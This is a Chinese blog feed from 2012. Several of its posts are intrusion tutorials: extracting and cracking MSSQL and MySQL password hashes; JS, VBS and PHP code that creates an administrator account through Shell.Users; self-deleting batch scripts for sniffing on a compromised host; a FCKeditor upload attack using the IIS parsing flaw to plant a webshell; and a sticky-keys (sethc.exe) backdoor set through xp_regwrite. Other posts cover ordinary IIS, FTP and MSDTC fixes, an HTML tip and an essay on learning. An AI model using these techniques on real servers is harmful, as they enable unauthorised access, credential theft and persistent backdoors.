E网的那些事儿

MsSql及MySql Hash的提取、破解

SiNsKy — Fri, 20 Jan 2012 15:50:44 +0800

MSSQL

mssql的hash保存在表master.dbo.sysxlogins中，用

select name,password from master.dbo.sysxlogins

可以提取用户hash
0x01004E04BE46023057E323AF27269E5B7DDCA140C98D225BDD3D06E8EFE8CFAEC02985B27B38059FA3B18349612B

分解：

常量部分：0×0100
Salt部分：4E04BE46
混合密文：023057E323AF27269E5B7DDCA140C98D225BDD3D
大写字母密文：06E8EFE8CFAEC02985B27B38059FA3B18349612B 后40位

有了HASH就可以破解了，用到的工具是CAIN。

转到CAIN的破解功能那里，添加一个待破解的MSSQL HASH
有三个需要写的文本框。

将salt ，混合密文跟大写字母密文填入，就可以破解了。

MYSQL

mysql的用户名密码保存在mysql库user表中，找到MySQL\data\mysql\目录下的 user.MYD user.MYI user.frm 三个文件，拷贝到自己的mysql数据库目录下，就可以查看用户的hash了。
用sql语句提取hash则如下：

use mysql;
select user,password from user;

得到hash：
test:*085D85329E1557C869A120C9157315A07D51E8A7
ogame:*085D85329E1557C869A120C9157315A07D51E8A7
iii6_com:*085D85329E1557C869A120C9157315A07D51E8A7
root:*5D0B157F0A3BB4DB1A0092B4F270FBDA486EC6EB
冒号左边是用户，右边是HASH
HASH值开头带”*”号的是MYSQL5的HASH
不带*号的是旧版MYSQL的HASH(也就是MYSQL323)

破解：

用passwordspro或者cain的破解器可以破解。

原文标题：MsSql及MySql Hash的提取、破解

原文链接：http://www.8pit.com/firefox/mssql-and-mysql-hash-extraction-crack_1902.html

订阅本站：http://feed.feedsky.com/sinsky 转载请注明来源，喜欢本站可以Feed订阅本站。

php版、js版和vbs 版shell.users 加管理员帐号方法

SiNsKy — Sun, 15 Jan 2012 02:12:32 +0800

js版和vbs版shell.users 加管理员账号的代码来自lcx

js:

var o=new ActiveXObject( "Shell.Users" );
z=o.create("test") ;
z.changePassword("123456","")
z.setting("AccountType")=3;

vbs:

Set  o=CreateObject( "Shell.Users" )
 Set z=o.create("test")
 z.changePassword "123456",""
 z.setting("AccountType")=3

php版的来自南拳Daddy

<?php
 echo "<div align=center><b>PHP 版Shell.Users加管理员帐号</b></div>";
 $username="IceSkin";
 $password="skin.com";
 $su = new COM("Shell.Users");
 $h=$su->create($username);
 $h->changePassword($password,"");
 $h->setting["AccountType"] = 3;//这句很重要可以把用户加入administrators 组,
 ?>

在php执行命令的函数如exec,system,shell_exec,proc_open,passthru,popen

以及wscript.shell 组建被禁用的情况下,这也许是一个机会。对apache 搭建的Web 服务器可以执行成功,IIS 好像权限不够,nginx 和lighttpd 搭建的web 服务器还没有测试。

原文标题：php版、js版和vbs 版shell.users 加管理员帐号方法

原文链接：http://www.8pit.com/firefox/shell-users_1899.html

订阅本站：http://feed.feedsky.com/sinsky 转载请注明来源，喜欢本站可以Feed订阅本站。

嗅探中非常有用的两个批处理命令

SiNsKy — Sun, 15 Jan 2012 02:00:30 +0800

两个嗅探中比较有用的批处理

第一个批处理:

在渗透中挂机嗅探的时候，如果检测管理员上线就注销自已的 bat
复制下面的内容保存为 xx.bat

quser>1.txt
:hhh
quser>2.txt
fc 1.txt 2.txt | find "*" && del xx.bat 1.txt 2.txt | logoff
goto hhh

说明
当下一个用户连接的时候,程序就删除bat并注销,如果没有用户连接就一直循环检测.

第二个批处理:

嗅探时候经常一不小心就挂了.结果就悲剧了.当然要选择尽量少的服务来嗅.比如你要嗅目标的1433及80.那你嗅其他的就没用.
这样会大大的减少宕机的可能性.如果看到丢包率超过10%就要注意啦. 赶紧停掉,看看那里没设置好.
如果还是不小心挂了呢.
没事.这里为您准备了一个BAT 在开嗅的时候运行它就行了哦.

:ping
ping baidu.com
IF ERRORLEVEL   1 GOTO reboot
IF ERRORLEVEL   0 GOTO ping
:reboot
shutdown /r /t 0

这里的baidu.com你可以设置为网关的IP或你的IP
如果能ping通的话就继续ping 如果不通的话就认为宕机,然后重启或自己写一些语句例如结束cain等.

原文标题：嗅探中非常有用的两个批处理命令

原文链接：http://www.8pit.com/firefox/sniffing-is-useful-in-two-batch-commands_1897.html

订阅本站：http://feed.feedsky.com/sinsky 转载请注明来源，喜欢本站可以Feed订阅本站。

解决Fckeditor删除所有上传页面如何上传入侵

SiNsKy — Sat, 14 Jan 2012 10:24:17 +0800

一些Fckeditor在没有上传页面的情况下的入侵方式。

首先,你得确定下Fckeditor的版本。

/FCKeditor/editor/dialog/fck_about.html

其次,你确定下以下几个上传页面是否真的被删除了呢?

/FCKeditor/editor/filemanager/browser/default/browser.html
/FCKeditor/editor/filemanager/browser/default/connectors/test.html
/FCKeditor/editor/filemanager/upload/test.html
/FCKeditor/editor/filemanager/connectors/test.html
/FCKeditor/editor/filemanager/connectors/uploadtest.html

嗯,好吧,都已经删除了,真是太倒霉了,怎么办,确认下这些文件有哪个存在的么

/fckeditor/editor/filemanager/connectors/aspx/connector.aspx
/fckeditor/editor/filemanager/connectors/asp/connector.asp
/fckeditor/editor/filemanager/connectors/php/connector.php

如果存在,那太好了,你可以继续看下去了,我这里以aspx的为例
1.查看Media目录下的文件：

/fckeditor/editor/filemanager/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Media&CurrentFolder=%2F

红色Media可以更改为File或者image,相应的进入文件或者图片目录下
2.利用iis解析漏洞创建1.asp特殊目录

fckeditor/editor/filemanager/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Media&CurrentFolder=%2F&NewFolderName=1.asp

Type对应的Media目录,NewFolderName对应的是特殊目录名字
3.构建表单:

<form id="frmUpload" enctype="multipart/form-data" action="http://www.8pit.com/fckeditor/editor/filemanager/connectors/aspx/connector.aspx?Command=FileUpload&Type=Media&CurrentFolder=%2Fasp.asp" method="post">
Upload a new file:<br>
<input type="file" name="NewFile" size="50"><br>
<input id="btnUpload" type="submit" value="Upload">
</form>

将以上代码保存为HTML格式,http://www.8pit.com修改成你入侵的网站地址,Type=Media是对应的Media目录,1.asp为特殊目录名。
PS：上传之后的路径需要你在上传表单里面的代码里找,当然,他的呈现方式是一个上传好了的文件名,全路径必须你自己组合,我相信你是会的。如果访问之后发现无法访问,试着上传一张正确的图片,再进行访问,如果访问成功,说明管理员已经补上了IIS路径解析漏洞,那你得另找出路了。

原文标题：解决Fckeditor删除所有上传页面如何上传入侵

原文链接：http://www.8pit.com/firefox/fckeditor-upload_1888.html

订阅本站：http://feed.feedsky.com/sinsky 转载请注明来源，喜欢本站可以Feed订阅本站。

Error Message:xpsql.cpp: 错误 5 来自 CreateProcess（第 737 行）第二解

SiNsKy — Sat, 14 Jan 2012 09:11:22 +0800

不明白的先看上一篇文章，地址：http://www.8pit.com/firefox/createprocess-737_1838.html

废话不多说直接上：

原理：

首先要知对方shift粘滞键功能可用，再次使用本方法劫持shift粘滞键功能；

方法：

SQL命令读取服务器终端端口:

exec master..xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp','PortNumber'

终端端口为3389,连接测试终端端口,并测试shift粘滞键功能，如果正常，继续。

sql命令查询注册表粘滞键是否被劫持

exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe','Debugger'

sql命令劫持注册表粘滞键功能,替换成任务管理器(当然,你随意)

xp_regwrite 'HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe',
'Debugger','REG_SZ','C:\WINDOWS\system32\taskmgr.exe'

sql命令删除注册表粘滞键的劫持功能保护你的服务器不再被他人利用

xp_regdeletekey 'HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe'

然后登录3389该干什么干什么吧~

原文标题：Error Message:xpsql.cpp: 错误 5 来自 CreateProcess（第 737 行）第二解

原文链接：http://www.8pit.com/firefox/createprocess-737-2_1880.html

订阅本站：http://feed.feedsky.com/sinsky 转载请注明来源，喜欢本站可以Feed订阅本站。

谈谈学习与沟通

SiNsKy — Wed, 11 Jan 2012 08:20:02 +0800

很多人知道，caoz读书的时候还算是好学生，至少混了个名校毕业，但是很少人知道，从初中起我就是抄作业大王。初中三年、年年班里第一，中考的时候年级第一，很多同学都纳闷，因为我并不是那种标准的好学生，先不说上课聊天不听讲神马的，只抄作业这一项，就足够让他们纠结不已。抄作业能抄出年级第一？这就看你怎么抄了。是机械式的复制，还是深入体会，博采众长。

到工作中，我发现，这真是一个优点，也是很多其他人的盲区。

先说个技术招聘的事情，Discuz是款非常流行的开源软件，招聘php工程师，大多数都看过discuz代码，在上面做过二次开发的比比皆是，而且有意思的是，几乎每个工程师都能挑出discuz的若干不足和问题，有时候我就会从中选择一些面试题，比如discuz在ip地区识别中的一些算法函数，一些复合索引和冗余字段的设计思路，乃至用户密码随机salt的原理，一深究下去，发现应聘者基本上都回答不出来。你不是看discuz代码了嘛？还做了半年以上的二次开发？还找到了人家若干问题？怎么人家的一些基本思路和设计原理搞不清楚呢？见过太多工程师，动辄就是discuz不灵，重写一套吧，但是较真一点，真能把discuz的设计思路和数据结构吃透的人，绝对是高手了，这些喊要重写一套的，没见到有谁达到了戴志康的技术高度。

再说IT评论家的事情，很多it评论家，看人家产品，满眼都是问题和缺陷，怎么说都有理，为什么他们做不成事情? 因为他们只会挑错，不会学习人家的优点。一些大公司的产品经理也是，因为进入大公司，往往进入一个相对成功的项目，所需要做的就是不断完善和优化，也就是不断挑错，所以他们挑错能力就很强，很有一手，但是一旦去创建新项目，成立新业务，他们不知道怎样学习别人的优点，靠挑错是无法成就一项新事业的，很抱歉又要说百度有啊了，他们找到了淘宝产品上无数缺陷，却没有真正体会淘宝成就的精髓。

腾讯就是一个很会学习的公司，不要认为机械的复制抄袭就可以创造同样的成绩，抄作业的很多，为什么有人可以得第一，大部分人就只会垫底。你是不是真的深入的分析别人成功的因素，并将其用自己的优势更加发扬光大了呢

面对产品，面对技术，学习和体会别人的优点，才是自己不断进步的动力和源泉。

面对人也是如此。

大公司的一个问题就是，人与人之间，部门与部门之间，往往是互相挑错，互相指责，互相埋怨，沟通成本巨高不下，你如果去挑别人缺点，恭喜你，你一定赢了，没有人是完美的，更何况是以自己为标杆来要求别人（甚至是以自己的理想为标杆）。但是为什么不换个思路，试图去发现一下别人的优点？试图去尊重一下别人的专业？

大家都说人才难得，招聘不易，其实也是一个道理，看别人公司的所谓高手个个钦羡，却不知道自己公司那个默默无闻的人也许才是璞玉。最近鸿门宴比较火，刘邦怎么夺的天下，韩信，陈平这可都是项羽的人，怀才不遇被刘邦重用。要是挑缺点，陈平这样的早就下课了对不对，但是刘邦不还是用其长。

善于学习，就要多去挖掘别人的优点，多去寻找别人成功的地方；不仅仅是做产品，做技术，也包括人与人的沟通交互，人才的培养和挖掘。

from：http://hi.baidu.com/caoz/blog/item/2fc87bcb0ea8a301bf09e66b.html

原文标题：谈谈学习与沟通

原文链接：http://www.8pit.com/firefox/talk-about-learning-and-communication_1878.html

订阅本站：http://feed.feedsky.com/sinsky 转载请注明来源，喜欢本站可以Feed订阅本站。

COM+ 无法与Microsoft分布式事务协调程序交谈

SiNsKy — Wed, 11 Jan 2012 00:42:56 +0800

首先先看服务是否正常运行，如果无服务可以尝试安装服务；

msdtc -install

如果有服务未正常启动，那就启动，如果启动不了，那就是无法正常启动了。那么按以下操作步骤：

1、删除注册表中的键值（注意，是该分类中的键值）
\H-L-M\SYSTEM\CurrentControlSet\Services\MSDTC\
\H-L-M\SOFTWARE\Microsoft\MSDTC\
\H-C-R\CID\
2、停止MSDTC服务：net stop msdtc
3、卸载MSDTC服务：msdtc -uninstall
4、重新安装MSDTC服务：msdtc -install
5、到服务中将messager服务改为自启动，并启动
6、查看组件服务是否正常，如果还没有，重新启动下电脑看看。

原文标题：COM+ 无法与Microsoft分布式事务协调程序交谈

原文链接：http://www.8pit.com/firefox/com-unable-to-talk-to-microsoft-distributed-transaction-coordinator_1873.html

订阅本站：http://feed.feedsky.com/sinsky 转载请注明来源，喜欢本站可以Feed订阅本站。

您不具备查看该目录或页面的权限，因为访问控制列表 (ACL) 对 Web 服务器上的该资源进行了配置。

SiNsKy — Wed, 11 Jan 2012 00:38:26 +0800

您未被授权查看该页

您不具备查看该目录或页面的权限，因为访问控制列表     (ACL)     对     Web     服务器上的该资源进行了配置。
——————————————————————————–

请尝试以下操作：

如果您认为自己应该能够查看该目录或页面，请与网站管理员联系。
单击刷新按钮，并使用其他凭据重试。
HTTP     错误     401.3     -     未经授权：访问由于     ACL     对所请求资源的设置被拒绝。
Internet     信息服务

这个错误的原因：网站源文件所在目录权限设置问题

解决方法：

找到这个网站所在的目录，点击右键属性—安全—添加everyone，并为everyone赋给相应的权限，问题解决。

查资料可能还有其他的原因，如果上面的方法解决不了，请试一下下面的方法：

1、访问目录请设置默认页

2、检查iis是否设置了匿名可访问

3、你的WEB对应的目录没有添加     IUSR_***     用户

原文标题：您不具备查看该目录或页面的权限，因为访问控制列表 (ACL) 对 Web 服务器上的该资源进行了配置。

原文链接：http://www.8pit.com/firefox/you-do-not-have-to-view-this-directory-or-page-privileges-because-the-access-control-list-acl-for-the-resource-on-the-web-server-was-configured_1871.html

订阅本站：http://feed.feedsky.com/sinsky 转载请注明来源，喜欢本站可以Feed订阅本站。

IIS FTP 530 User cannot log in, home directory inaccessible原因

SiNsKy — Tue, 10 Jan 2012 23:09:14 +0800

今天遇到一星外配安全和环境，星外恢复后N多问题出现，FTP无法登录，这是其中之一：

530 User junhcn cannot log in, home directory inaccessible. 530 User junhcn cannot log in, home directory inaccessible.

FTP 连接时遇到这个错误，首先可以肯定用户名和密码是正确了的。

错误多半是由于没有为用户分配正确的 NTFS 权限造成的，即用户没有权限访问 FTP 的目录。

但还有一种令人发毛的原因，NTFS 都已经开到 everyone 了，IIS 都重启 N 次了，还是提示上述错误。

那么可能是这么一个原因，FTP 使用了用户隔离，却没有正确配置

您没有使用隔离？

那么检查一下，ftp 根目录，用户可能只需要访问一个虚拟目录，并不需要访问根目录，但是至少要对根目录有读权限。可以设置一个只读的无内容的目录作为根目录。

疑问：我的根目录是默认的 C:\inetpub\ftproot，我没有将用户在上面设权限，也能用呢。

这是由于有个 Users 组，Users 组对这个目录有权限。而 Users 组有个 Authenticated Users 虚拟的组，表示认证了的用户。FTP 登录，就是属于认证了的用户，也就有权限了。

然后还有就是，登录之后不显示目录，这个也是由于星外主机BT造成的，目录权限控死了，给该用户和目录相应写权限即可。

原文标题：IIS FTP 530 User cannot log in, home directory inaccessible原因

原文链接：http://www.8pit.com/firefox/iis-ftp-530-user-cannot-log-in-home-directory-inaccessible-because-530-user-junhcn-cannot-log-in-home-directory-inaccessible-530-user-junhcn-cannot-log-in-home-directory-inaccessible_1866.html

订阅本站：http://feed.feedsky.com/sinsky 转载请注明来源，喜欢本站可以Feed订阅本站。

HTML标签中为什么有的标签要独占一行？？

SiNsKy — Mon, 09 Jan 2012 02:17:51 +0800

这问题问得很妙~。。。

其实这个问题你该问W3C，规则是他们制定的，我们只是使用者。

常见独占一行的标签有p，h1等。

如何让他们不独占呢~

第一个，给它们一个属于自己的width。

如p{width:10px}

第二个，通过CSS给他们一个float的值,使元素向左或向右浮动, HTML标签设置了float属性之后，它将不再独自占据一行

怎么样，试试吧~

原文标题：HTML标签中为什么有的标签要独占一行？？

原文链接：http://www.8pit.com/firefox/why-do-some-html-tags-in-the-tag-to-its-own-line_1864.html

订阅本站：http://feed.feedsky.com/sinsky 转载请注明来源，喜欢本站可以Feed订阅本站。

E网的那些事儿

MsSql及MySql Hash的提取、破解

MSSQL

分解：

MYSQL

破解：

php版、js版和vbs 版shell.users 加管理员帐号方法

js:

vbs:

php版的来自 南拳Daddy

嗅探中非常有用的两个批处理命令

解决Fckeditor删除所有上传页面如何上传入侵

Error Message:xpsql.cpp: 错误 5 来自 CreateProcess（第 737 行） 第二解

原理：

方法：

SQL命令读取服务器终端端口:

sql命令查询注册表粘滞键是否被劫持

sql命令劫持注册表粘滞键功能,替换成任务管理器(当然,你随意)

sql命令删除注册表粘滞键的劫持功能保护你的服务器不再被他人利用

谈谈学习与沟通

COM+ 无法与Microsoft分布式事务协调程序交谈

您不具备查看该目录或页面的权限，因为访问控制列表 (ACL) 对 Web 服务器上的该资源进行了配置。

IIS FTP 530 User cannot log in, home directory inaccessible原因

您没有使用隔离？

HTML标签中为什么有的标签要独占一行？？

php版的来自南拳Daddy

Error Message:xpsql.cpp: 错误 5 来自 CreateProcess（第 737 行）第二解